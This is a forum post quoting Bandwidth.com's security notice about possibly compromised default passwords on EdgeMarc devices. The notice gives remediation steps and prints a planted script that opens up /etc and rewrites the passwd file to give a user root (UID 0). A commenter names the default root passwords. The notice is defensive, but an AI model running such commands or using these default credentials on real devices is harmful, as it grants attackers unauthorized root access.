

Bandwidth.com – EdgeMarc Device Passwords Potentially Compromised - edoceo

Just got this email, eeek!&lt;p&gt;---
Dear Bandwidth Customers,&lt;p&gt;Bandwidth has discovered an issue wherein EdgeMarc device default passwords may have been compromised on the internet.&lt;p&gt;Any customer who currently owns the EdgeMarc box should immediately change their password.&lt;p&gt;If you are unsure if your specific device has been compromised, you can take the following steps to investigate.  However, it is still highly recommended to change the password:&lt;p&gt;In the EdgeMarc GUI, under &#x27;System&#x27; click on &quot;Client List&quot;.  If there are any entries listed other than known and local IP addresses, there is a strong possibility that your device has been compromised.  To resolve, remove the offending IP address.&lt;p&gt;Additionally, the following steps should be taken to to ensure a secure device:&lt;p&gt;Disable PPTP (Point-to-Point Protocol) - Under PPTP server &gt; Username, ensure there is no user built unless it is a known user.&lt;p&gt;Disallow WAN clients - Under VoIP ALG, uncheck both the &#x27;allow clients on WAN&#x27; option, as well as the &#x27;Enable LLDP&#x27; option.&lt;p&gt;Verify no additional scripting has taken place, by looking under &#x27;User Commands&#x27;.  Specifically, if the following script is present, it will need to be deleted:&lt;p&gt;&lt;pre&gt;&lt;code&gt;  ln -sf &#x2F;etc &#x2F;etc&#x2F;images&#x2F;m.txt
  chmod 777 &#x2F;etc&#x2F;images&#x2F;m.txt&#x2F;config&#x2F;passwd
  sed -i -e s&#x27;_&#x27;&quot;501&quot;&#x27;_&#x27;&quot;0&quot;&#x27;_&#x27; &#x2F;etc&#x2F;images&#x2F;m.txt&#x2F;config&#x2F;passwd
  sed -i -e s&#x27;_&#x27;&quot;501&quot;&#x27;_&#x27;&quot;0&quot;&#x27;_&#x27; &#x2F;etc&#x2F;images&#x2F;m.txt&#x2F;config&#x2F;passwd
  sed -i -e s&#x27;_&#x27;&quot;&#x2F;etc&#x2F;images&quot;&#x27;_&#x27;&quot;&#x2F;&quot;&#x27;_&#x27; &#x2F;etc&#x2F;images&#x2F;m.txt&#x2F;config&#x2F;passwd
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
---
======
labpdx
Seems the default root password is 'default' or 'password', and is listed in
their manuals / documentation.

[https://www.google.com/#q=edgemarc+default+password](https://www.google.com/#q=edgemarc+default+password)

